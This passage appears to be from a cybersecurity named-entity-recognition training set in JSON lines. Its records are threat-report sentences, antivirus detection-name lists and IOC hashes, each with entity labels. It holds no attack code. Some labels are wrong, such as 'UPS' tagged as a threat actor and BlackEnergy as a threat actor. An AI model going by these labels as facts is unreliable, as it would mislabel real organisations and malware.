Downloader.Stantinko.Win32.10 Trojan-Downloader.Win32.Stantinko Variant.Graftor.eb Trojan.Graftor.D2AB64 Trojan/Win32.Kimad.R138166 Trojan.DL.Stantinko! 
Win32/Trojan.Stantinko.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007206", "source": "cyner2_train"}} {"text": "DarkKomet is a freeware remote access trojan that was released by an independent software developer.", "spans": {"MALWARE: DarkKomet": [[0, 9]], "MALWARE: freeware remote access trojan": [[15, 44]], "THREAT_ACTOR: independent software developer.": [[69, 100]]}, "info": {"id": "cyner2_train_007207", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownloadGelodeA.Trojan Adware.WSearch.Win32.494 TROJ_RUGO.SM Win32.Trojan.WisdomEyes.16070401.9500.9989 TROJ_RUGO.SM Trojan.Win32.Dwn.vrhnq Trojan.DownLoader5.16461 TR/Graftor.16274.28 Trojan/Win32.Unknown TrojanDownloader:Win32/Nekotimed.A Trojan.Graftor.D3F92 Downloader/Win32.Nekill.R1661 Adware.WSearch!QcX4Awfq1EM Trojan-Downloader.Win32.Adnur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007209", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.163 Trojan.FTKN-6 Doc.Macro.Injection-6355574-0 VB:Trojan.Valyria.163 Troj.Downloader.Script!c VB:Trojan.Valyria.163 W97M.DownLoader.631 VB:Trojan.Valyria.163 VB:Trojan.Valyria.163 Win32.Outbreak VB:Trojan.Valyria.163 virus.office.qexvmc.1070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007210", "source": "cyner2_train"}} {"text": "The effectiveness of a zero-day quickly deteriorates as an attack tool after it gets discovered and patched by the affected software vendors.", "spans": {"VULNERABILITY: zero-day": [[23, 31]], "MALWARE: attack tool": [[59, 70]], "ORGANIZATION: software vendors.": [[124, 141]]}, "info": {"id": "cyner2_train_007211", "source": "cyner2_train"}} {"text": "Small businesses are generally more likely to use remote administration software for their POS terminals so that 3rd parties can manage the terminals.", "spans": {"ORGANIZATION: Small businesses": [[0, 16]], "SYSTEM: remote administration software": [[50, 
80]], "SYSTEM: POS terminals": [[91, 104]]}, "info": {"id": "cyner2_train_007212", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Nurjax TROJ_GE.273CBA41 Trojan.Win32.Nurjax.ufm Trojan.Win32.Nurjax.dxmzxe Trojan.Win32.Z.Nurjax.10297344 Troj.W32.Nurjax!c BehavesLike.Win32.Dropper.tc W32/Trojan.TKWG-0004 Trojan.Nurjax.a Trojan/Win32.Nurjax TrojanDownloader:Win32/Lentrigy.A Trojan.Win32.Nurjax.ufm Trj/CI.A Win32.Trojan.Nurjax.Ajbs Trojan.Nurjax! W32/Nurjax.BQZ!tr Win32/Trojan.e9c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007214", "source": "cyner2_train"}} {"text": "The Fidelis Threat Research team recently analyzed a new variant to Vawtrak using HTTPS for C2 communications.", "spans": {"ORGANIZATION: The Fidelis Threat Research team": [[0, 32]], "MALWARE: variant": [[57, 64]], "MALWARE: Vawtrak": [[68, 75]]}, "info": {"id": "cyner2_train_007215", "source": "cyner2_train"}} {"text": "These thefts targeted banks in Vietnam, Bangladesh, Taiwan, and Mexico between 2016 and 2017.", "spans": {"ORGANIZATION: banks": [[22, 27]]}, "info": {"id": "cyner2_train_007218", "source": "cyner2_train"}} {"text": "North Korea conducted a test missile launch on 3rd July.", "spans": {}, "info": {"id": "cyner2_train_007219", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Hacktool.BruteForce.mp Win32.Trojan.WisdomEyes.16070401.9500.9985 Win.Trojan.Hacktool-315 Trojan.Win32.BruteForce.recrn Tool.Bruteforce.84 Tool.BruteForce.Win32.143 HTool.BruteForce.g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007220", "source": "cyner2_train"}} {"text": "In order to ensure we have the most effective detection possible, Talos reverse engineered CryptoWall 4 to better understand its execution, behavior, deltas from previous versions and share our research and findings with the community.", "spans": {"ORGANIZATION: Talos": [[66, 71]], "MALWARE: CryptoWall 4": [[91, 103]], "ORGANIZATION: community.": 
[[225, 235]]}, "info": {"id": "cyner2_train_007222", "source": "cyner2_train"}} {"text": "We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation.", "spans": {"ORGANIZATION: Dropbox": [[21, 28]], "MALWARE: threat,": [[48, 55]], "ORGANIZATION: cooperation": [[64, 75]]}, "info": {"id": "cyner2_train_007223", "source": "cyner2_train"}} {"text": "PluginPhantom implements each element of malicious functionality as a plugin, and utilizes a host app to control the plugins.", "spans": {"MALWARE: PluginPhantom": [[0, 13]], "MALWARE: malicious functionality": [[41, 64]], "SYSTEM: plugin,": [[70, 77]], "SYSTEM: host app": [[93, 101]]}, "info": {"id": "cyner2_train_007230", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Byterage.8193 Trojan/Downloader.Byterage Trojan.Win32.Byterage.hipq W32/Downloader.HPW Byterage.C TROJ_EXCEPTION.F Trojan-Downloader.Win32.Byterage Trojan.Byterage.A Trojan.Win32.Downloader.8193 Virus.Win32.Part.k TrojWare.Win32.TrojanDownloader.Byterage Trojan.Duho TR/Byterage.Dldr TROJ_EXCEPTION.F TrojanDownloader.Win32.Byterage Trojan/Win32.Byterage Win32.Troj.DownByteage.kcloud W32/Downloader.KOEY-6366 Win-Trojan/Byterage.8193 Malware-Cryptor.InstallCore.1 Win32/TrojanDownloader.Byterage Trojan.DL.Byterage Trojan-Downloader.Win32.Small W32/Dloader.AW!tr Downloader.Byterage", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007231", "source": "cyner2_train"}} {"text": "In addition, thanks to a coding mistake by the attackers, this particular backdoor does not always run the right commands.", "spans": {"VULNERABILITY: coding mistake": [[25, 39]], "THREAT_ACTOR: attackers,": [[47, 57]], "MALWARE: backdoor": [[74, 82]]}, "info": {"id": "cyner2_train_007232", "source": "cyner2_train"}} {"text": "The gopuram backdoor might be the main implant and the final payload in the attack chain.", "spans": {"MALWARE: The gopuram": [[0, 11]], 
"MALWARE: backdoor": [[12, 20]], "MALWARE: implant": [[39, 46]], "MALWARE: final payload": [[55, 68]]}, "info": {"id": "cyner2_train_007234", "source": "cyner2_train"}} {"text": "We also observed that the threat actors were actively changing their tools, tactics, and procedures TTPs to bypass security solutions.", "spans": {"THREAT_ACTOR: the threat actors": [[22, 39]], "MALWARE: tools,": [[69, 75]], "VULNERABILITY: bypass security solutions.": [[108, 134]]}, "info": {"id": "cyner2_train_007235", "source": "cyner2_train"}} {"text": "A backdoor also known as: Java.Exploit.CVE-2012-0507.K Exp.JAVA.CVE-2012-0507 Trojan.Inject.GE Exploit.CVE.JS.1533 Exploit.Java.Cve!c Java.Exploit.CVE-2012-0507.K Trojan.Maljava Java/Exploit.CVE-2012-0507.AJ JAVA_EXPLOIT.KRZ Exploit.Java.CVE-2012-0507.gd Exploit.Java.CVE20120507.cqxpdq Java.S.CVE-2012-0507.141383[h] Java.Exploit.CVE-2012-0507.K Java.Exploit.CVE-2012-0507.K Exploit.CVE2012-0507.13 JAVA_EXPLOIT.KRZ BehavesLike.Downloader.cz Exploit.CVE-2012-0507.d JAVA/Adwind.sagg.26 Java.Exploit.CVE-2012-0507.K Exploit.Java.CVE-2012-0507.eg Java.Exploit.Cve-2012-0507.Akpd Exploit.Java.CVE-2012-0507 Java.Exploit.CVE-2012-0507.K Java/Exploit.AZT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007237", "source": "cyner2_train"}} {"text": "The final stage is an ARMEB version from the LuaBot Malware.", "spans": {"MALWARE: ARMEB version": [[22, 35]], "MALWARE: LuaBot Malware.": [[45, 60]]}, "info": {"id": "cyner2_train_007238", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.5441 Win32.Trojan.WisdomEyes.16070401.9500.9941 TROJ_INJECT.AUSPTO Trojan.Win32.Phpw.gez Trojan.Win32.Phpw.expttn TROJ_INJECT.AUSPTO BehavesLike.Win32.Trojan.cc Trojan.Win32.Themida W32/Trojan.JODZ-3607 Trojan.Win32.Phpw.gez Backdoor:MSIL/Zqorat.A Trojan/Win32.Phpw.C2403487 TScope.Malware-Cryptor.SB Trj/CI.A Win32.Trojan.Phpw.Ahym", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007239", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBS.Downloader.ADR JS.Ransom.R VBS/Downldr.HM VBS.Downloader.B Vbs.Downloader.Locky-6348805-0 Trojan.VBS.Downloader.ADR Trojan.VBS.Downloader.ADR Trojan.Script.Vbs-heuristic.druvzi VBS.Downloader.11760 Troj.Downloader.Script!c Trojan.VBS.Downloader.ADR Trojan.VBS.Downloader.ADR VBS.DownLoader.957 VBS/Downloader.ea VBS/Downldr.HM Trojan.VBS.Downloader.ADR VBS/Obfus.S4 VBS/Downloader.ea Js.Trojan.Raas.Auto Trojan-Downloader.JS.Nemucod", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007243", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware14 Trojan/W32.Nymaim.478544 Trojan.Win32.Shiz.3!O Trojan.Kryptik.Win32.905858 Trojan.Inject2.25223 Trojan:Win32/Pennelas.A!gfc Trojan/Win32.Silcon.R186780 Trojan.Nymaim!w9Ehxpvgr9U Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007244", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Htool.WIP Trojan.Mauvaise.SL1 HackTool.BruteForce Trojan/Hacktool.BruteForce.ze Application.Htool.WIP Win32.Trojan.WisdomEyes.16070401.9500.9930 Win32/Tnega.dRWGBOC HV_BRUTEFORCE_CG153BD9.RDXN Win.Trojan.Bruteforce-13 Application.Htool.WIP Application.Htool.WIP Trojan.Win32.BruteForce.srzyv Application.Htool.WIP Tool.Bruteforce.185 Tool.BruteForce.Win32.254 HackTool.Win32.BruteForce HTool.BruteForce.f SPR/DUBrute.owoan HackTool/Win32.BruteForce HackTool:Win32/DUBrute.A HackTool.BruteForce Trojan/Win32.Bruteforce.R23399 HackTool.BruteForce!jw9TQR6yLS4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007246", "source": "cyner2_train"}} {"text": "This is worm-like ransomware based on Petya.", "spans": {"MALWARE: worm-like ransomware": [[8, 28]], "MALWARE: Petya.": [[38, 44]]}, "info": {"id": "cyner2_train_007247", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE W32.Francette.M W32.Francette.Worm 
Heur.Corrupt.PE Backdoor.Win32.RedSpy Worm:Win32/Francette.M.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007248", "source": "cyner2_train"}} {"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda 1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ .", "spans": {}, "info": {"id": "cyner2_train_007249", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Emudbot.S15201 Worm.AutoRun.Win32.57341 W32/AutoRun.diqe Win32.Trojan.WisdomEyes.16070401.9500.9953 Win.Worm.Autorun-9966 Worm.AutoRun Trojan.Win32.Emud.reytg Win32.HLLW.EmudBot.12 BehavesLike.Win32.BadFile.kh Worm/AutoRun.agrm W32.Worm.Autorun Worm.Autorun.kcloud Worm:Win32/Emudbot.A Trojan.Graftor.Elzob.D3011 Worm/Win32.AutoRun.C69047 Win32/AutoRun.Delf.MI Worm.AutoRun!NSqws7tLdQs Worm.Win32.Emudbot W32/Autorun.BGT!tr Win32/Trojan.Dropper.65e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007250", "source": "cyner2_train"}} {"text": "We Kaspersky have already seen some cryptor attacks where malicious programs with different functions have been used in combination.", "spans": {"ORGANIZATION: 
Kaspersky": [[3, 12]], "MALWARE: malicious programs": [[58, 76]]}, "info": {"id": "cyner2_train_007252", "source": "cyner2_train"}} {"text": "iSIGHT Partners has dubbed the intrusion operators who leverage the CVE-2014-4114 zero-day Sandworm Team. The name was chosen due to unique references to the classic science fiction series Dune, which are characterized by the use of multiple BlackEnergy malware variants.", "spans": {"ORGANIZATION: iSIGHT Partners": [[0, 15]], "THREAT_ACTOR: intrusion operators": [[31, 50]], "VULNERABILITY: CVE-2014-4114 zero-day": [[68, 90]], "THREAT_ACTOR: Sandworm Team.": [[91, 105]], "MALWARE: BlackEnergy malware variants.": [[242, 271]]}, "info": {"id": "cyner2_train_007254", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Teper Trojan/AutoRun.Delf.lv Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_INJECTOR_FA250012.UVPM Trojan.Win32.DarkKomet.dkhkpy TrojWare.MSIL.Teper.A Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FA250012.UVPM BehavesLike.Win32.Trojan.dc Backdoor/Androm.dvy TR/Inject.xbbeiet W32/Vobfus.GEP.worm Win32/AutoRun.Delf.LV Win32.Worm.Autorun.Suxp Win32/Trojan.d74", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007255", "source": "cyner2_train"}} {"text": "They are using the RockLoader malware to download Bart over HTTPS.", "spans": {"MALWARE: RockLoader malware": [[19, 37]], "MALWARE: Bart": [[50, 54]]}, "info": {"id": "cyner2_train_007258", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Trojan.WisdomEyes.16070401.9500.9996 W32.SillyFDC Win32/Auraax.W Win.Trojan.Zbot-1219 Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Trojan.DownLoad.5092 Worm.AutoRun.Win32.24333 Backdoor.W32.Bifrose.kZn8 Win32/AutoRun.YM Trojan-Spy.Win32.Zbot W32/Autorun.MFA!worm Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007259", 
"source": "cyner2_train"}} {"text": "The threat posed by custom malware such as Dripion illustrates the value of multilayered security.", "spans": {"MALWARE: threat": [[4, 10]], "MALWARE: custom malware": [[20, 34]], "MALWARE: Dripion": [[43, 50]]}, "info": {"id": "cyner2_train_007260", "source": "cyner2_train"}} {"text": "However, it doesn't stop there: some versions of RAA also include a Pony Trojan file, which steals confidential information from the infected computer.", "spans": {"MALWARE: RAA": [[49, 52]], "MALWARE: Pony Trojan file,": [[68, 85]], "SYSTEM: the infected computer.": [[129, 151]]}, "info": {"id": "cyner2_train_007261", "source": "cyner2_train"}} {"text": "The attack was initially thought to be attributed to North Korea, by way of a Chinese IP found during the attack, but no other strong evidence of North Korea's involvement has been produced since then.", "spans": {}, "info": {"id": "cyner2_train_007263", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PPDropper.F PPT97/PPDropper.C TROJ_PPDROPPER.L TROJ_PPDROPPER.L Exploit-PPT.d Exploit:Win32/Nappto.A Exploit-PPT.d PP97M/TrojanDropper.PPDrop.F Trojan-Dropper.PP97M.Ppdrop Exploit/PPT.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007265", "source": "cyner2_train"}} {"text": "This is the same behaviour we have been seeing with the recent UPS failed to deliver nemucod ransomware versions", "spans": {"THREAT_ACTOR: UPS": [[63, 66]], "MALWARE: nemucod ransomware versions": [[85, 112]]}, "info": {"id": "cyner2_train_007267", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Ryzerlo.S4 Trojan.Ransom.HiddenTear Trojan.Ransom.HiddenTears.1 Win32.Trojan.WisdomEyes.16070401.9500.9717 Ransom.HiddenTear!g1 Ransom_CRYPTEAR.SMI1 Trojan.Win32.Encoder.ewzwkj Trojan.Win32.Z.Ransom.174592.P Trojan.Encoder.10598 Ransom_CRYPTEAR.SMI1 Trojan-Ransom.HiddenTear W32/Ransom.EJHW-4383 TR/Downloader.fuswg Ransom:MSIL/Flyterper.A Trj/GdSda.A 
Win32/Trojan.Ransom.786", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007268", "source": "cyner2_train"}} {"text": "Several indicators inside the samples we have analysed point to a new major version of the malware.", "spans": {"MALWARE: samples": [[30, 37]], "MALWARE: malware.": [[91, 99]]}, "info": {"id": "cyner2_train_007271", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DroppenAS.Trojan Worm.Nohad.A9 Trojan/AutoRun.Delf.qi Win32.Worm.Delf.bw W32/Trojan.KDXB-0268 Win32/Tnega.AUMK WORM_SOHANAD.SM0 Win32.Worm.Autorun.T Trojan.Win32.Special.dtabba Trojan.Fakealert.51818 WORM_SOHANAD.SM0 W32/Trojan2.OEMC TR/Dropper.pjrqu Trojan.Zusy.D18D1A HEUR/Fakon.mwf Win32/AutoRun.Delf.QI W32/AutoRun.QIAU!tr VBS/Jenxcus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007272", "source": "cyner2_train"}} {"text": "We identified over two hundred samples of malware generated by the group over the last two years.", "spans": {"MALWARE: malware": [[42, 49]], "THREAT_ACTOR: the group": [[63, 72]]}, "info": {"id": "cyner2_train_007273", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/AutoRun.bhyp Trojan.Heur.E5CD44 Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/MalwareF.IWEH Win.Spyware.76175-2 Trojan.Win32.FrusEfas.iumlo Worm.Win32.Autorun.2101887 Trojan.MulDrop1.52015 BehavesLike.Win32.BadFile.vc W32/Risk.GYGM-4699 TrojanClicker.FrusEfas.a Trojan:Win32/Tofe.A Worm.AutoRun Trojan-GameThief.Win32.Magania", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007274", "source": "cyner2_train"}} {"text": "To that end, I have been working on automating ways to help ASERT better understand the context around samples so we can answer question about what may have been targeted, why it was targeted and when it was targeted.", "spans": {}, "info": {"id": "cyner2_train_007276", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Simda.A Trojan.Beaugrit.S714409 
Backdoor.Simda.A Trojan.Shiz.Win32.341 Trojan/Spy.Shiz.ncd Win32.Trojan-Spy.Shiz.b Backdoor.Trojan TROJ_BEAUGRIT_GC3101D5.UVPM Backdoor.Simda.A Backdoor.Simda.A TrojWare.Win32.Spy.Shiz.AB Backdoor.Simda.A Trojan.PWS.Ibank.300 TROJ_BEAUGRIT_GC3101D5.UVPM BehavesLike.Win32.Backdoor.jh Backdoor.Win32.Simda Backdoor.Simda.A Backdoor.Simda.A Backdoor.Simda TrojanSpy.Shiz!u9u05UapnAM W32/Shiz.NBX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007277", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutorunSevLnr.Worm Worm.AutoRun.Win32.27239 WORM_VERST.SM Win32.Worm.AutoRun.fp W32/Trojan2.OAQT WORM_VERST.SM Trojan.Win32.AutoRun.bxdzl W32.Virut.mDxm BackDoor.Pushnik.16 BehavesLike.Win32.Autorun.jc W32/Trojan.ORVC-8944 Worm/AutoRun.zqc W32.Worm.Lj Worm:Win32/Verst.A Trojan.Rimecud.2 Worm.Win32.A.P2P-Palevo.649216 HEUR/Fakon.mwf W32/Autorun.worm.bcf Worm.AutoRun Trojan.Dropper Win32/AutoRun.Delf.DK Trojan.Kryptik!Od8vCev28v4 Trojan.Win32.DNSChanger Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007278", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.FakeTool.eqvbgr Trojan.Strictor.D13D9C Riskware.HackTool!mJNDS6pSVDk HackTool.Win32.FakeHack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007279", "source": "cyner2_train"}} {"text": "In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active.", "spans": {"ORGANIZATION: Trend Micro": [[16, 27]], "ORGANIZATION: ClearSky": [[32, 40]], "THREAT_ACTOR: espionage apparatus": [[55, 74]], "THREAT_ACTOR: the group": [[100, 109]]}, "info": {"id": "cyner2_train_007281", "source": "cyner2_train"}} {"text": "the first of a new wave of malspam.", "spans": {}, "info": {"id": "cyner2_train_007282", "source": "cyner2_train"}} {"text": "MacSpy is advertised as the most sophisticated Mac spyware ever with the low starting price of free.", 
"spans": {"MALWARE: MacSpy": [[0, 6]], "MALWARE: Mac spyware": [[47, 58]]}, "info": {"id": "cyner2_train_007284", "source": "cyner2_train"}} {"text": "However, they do deploy some novel tactics, detailed below, and the implications of these attacks could be significant.", "spans": {}, "info": {"id": "cyner2_train_007285", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RsRabND.Worm Trojan.Ransom.BUY Trojan.Ransom.BUY Ransom.BadRabbit Win32.Trojan.Ransom.b Ransom_BADRABBIT.SM Win.Ransomware.BadRabbit-6355462-2 Trojan.Ransom.BUY Trojan-Ransom.Win32.BadRabbit.e Trojan.Ransom.BUY Trojan.Win32.BadRabbit.euhxbd Trojan.Win32.Ransom.441899 Trojan.Ransom.BUY Trojan.BadRabbit.2 Ransom_BADRABBIT.SM BehavesLike.Win32.Malware.gc Trojan.Win32.Diskcoder Trojan.BadRabbit.d TR/Dropper.uobxc Trojan.Ransom.BUY Trojan-Ransom.Win32.BadRabbit.e Trojan/Win32.Diskcoder.R211512 Trojan-Ransom.BadRabbit Trj/CI.A Trojan.Badrabbit Win32/Diskcoder.D Trojan.Diskcoder! ransom.BadRabbit Win32/Trojan.RansomBadRabbit.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007286", "source": "cyner2_train"}} {"text": "We actually track samples of Winnti malware all the time, but so far we haven't been able to catch one with solid clues indicating other targeted industries.", "spans": {"MALWARE: Winnti malware": [[29, 43]]}, "info": {"id": "cyner2_train_007287", "source": "cyner2_train"}} {"text": "A backdoor also known as: TR/Drop.Hirin.B PWS:MSIL/Parple.B PWS.MSIL Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007288", "source": "cyner2_train"}} {"text": "Google's Threat Analysis Group TAG recently discovered usage of an unpatched security bypass in Microsoft's SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings.", "spans": {"ORGANIZATION: Google's Threat Analysis Group TAG": [[0, 34]], "VULNERABILITY: unpatched security bypass": [[67, 
92]], "SYSTEM: Microsoft's SmartScreen security feature,": [[96, 137]], "THREAT_ACTOR: financially motivated actors": [[144, 172]], "MALWARE: the Magniber ransomware": [[194, 217]]}, "info": {"id": "cyner2_train_007289", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Gamehack Trojan.Packed.Win32.57174 Win32.Packed.VMProtect.a HT_GAMEHACK_GH01014A.UVPM HT_GAMEHACK_GH01014A.UVPM Trojan.VMProtect!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007290", "source": "cyner2_train"}} {"text": "Few details were given and no hashes were available, which made it interesting to find samples and conduct an initial analysis.", "spans": {}, "info": {"id": "cyner2_train_007291", "source": "cyner2_train"}} {"text": "Given its age, it might seem logical that security controls would have this threat on lockdown.", "spans": {}, "info": {"id": "cyner2_train_007293", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Clicker!BT Win32.Trojan.Wowlik.a W32/Trojan.AKEF-2737 Trojan.Win32.Graftor.espyif Win32.Trojan.Graftor.Llrb TrojWare.Win32.Wowlik.BE Trojan.DownLoader11.55853 Trojan.Graftor.D26FB7 TrojanClicker:Win32/Spackit.A Trojan.Win32.Clicker!BT Trj/CI.A Win32/Trojan.55a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007294", "source": "cyner2_train"}} {"text": "What's particularly interesting is that the malware that was used this time is not BlackEnergy, which poses further questions about the perpetrators behind the ongoing operation.", "spans": {"MALWARE: malware": [[44, 51]], "THREAT_ACTOR: BlackEnergy,": [[83, 95]], "THREAT_ACTOR: operation.": [[168, 178]]}, "info": {"id": "cyner2_train_007296", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97m.Downloader.EMU W97M.Downloader.MF W97M/Dropper.cp Troj.Dropper.Msword!c Trojan.Mdropper W2KM_DROPPR.CSYH W97m.Downloader.EMU W97m.Downloader.EMU W97m.Downloader.EMU Trojan:W97M/Nastjencro.A W97M.MulDrop.142 
W2KM_DROPPR.CSYH W97M/Dropper.cp W97m.Downloader.EMU W97m.Downloader.EMU OLE.Win32.Macro.700400 virus.office.obfuscated.5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007297", "source": "cyner2_train"}} {"text": "The version number was bumped to 1.6.2a.", "spans": {}, "info": {"id": "cyner2_train_007299", "source": "cyner2_train"}} {"text": "Our research points to centralized planning and development by one or more advanced persistent threat APT actors.", "spans": {"THREAT_ACTOR: advanced persistent threat APT actors.": [[75, 113]]}, "info": {"id": "cyner2_train_007302", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32/Virut.AM Win32/Virut.17408 PE_VIRUX.R Win32.Virus.Virut.U Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.lqR9 Win32.Virut.56 Virus.Virut.Win32.1938 PE_VIRUX.R BehavesLike.Win32.VBObfus.dc W32/Virut.AM Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.dd.368640 Virus.Win32.Virut.ce Win32/Virut.F Win32/Virut.NBP W32/Virut.CE Virus.Virut.14 W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007304", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LionumD.Trojan Trojan.Injector.AF Trojan-Spy.Win32.Zbot!O Trojan.CoinMiner.Win32.82 Trojan.Injector.AF Trojan.Win32.Delf.bkqgta Trojan.Injector.AF Trojan.DownLoader7.62911 Trojan/Win32.Miner TrojanDownloader:Win32/Hoptto.B Trojan.Injector.AF Trojan.Injector.AF Trojan.Injector.AF Virus.Win32.DelfInject", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007305", "source": "cyner2_train"}} {"text": "Research reports on the adversary are published from LAC SecureWorks and Palo Alto Networks", "spans": {"ORGANIZATION: Research": [[0, 8]], "THREAT_ACTOR: the adversary": [[20, 33]], "ORGANIZATION: LAC": [[53, 56]], "ORGANIZATION: SecureWorks": [[57, 68]], "ORGANIZATION: Palo Alto Networks": [[73, 91]]}, "info": 
{"id": "cyner2_train_007306", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.50FA Trojan.Win32.Pakes.miu Trojan.Symmi.D62C5 Trojan.Win32.Bepiv TR/Drop.RKit.CM Backdoor:WinNT/Tofsee.A.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007308", "source": "cyner2_train"}} {"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? It abuses accessibility services .", "spans": {"SYSTEM: Android": [[18, 25]], "MALWARE: TrickMo": [[45, 52]]}, "info": {"id": "cyner2_train_007309", "source": "cyner2_train"}} {"text": "A recent research by Check Point Research shows how voice phishing can be used to infiltrate the South Korean banking sector and extract private data from the victim's mobile device, and how to prevent it.", "spans": {"ORGANIZATION: Check Point Research": [[21, 41]], "ORGANIZATION: the South Korean banking sector": [[93, 124]], "SYSTEM: the victim's mobile device,": [[155, 182]]}, "info": {"id": "cyner2_train_007311", "source": "cyner2_train"}} {"text": "The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed.", "spans": {"MALWARE: malware": [[4, 11]], "VULNERABILITY: 24 potential security products that": [[57, 92]], "SYSTEM: system": [[113, 119]]}, "info": {"id": "cyner2_train_007314", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.ZIY 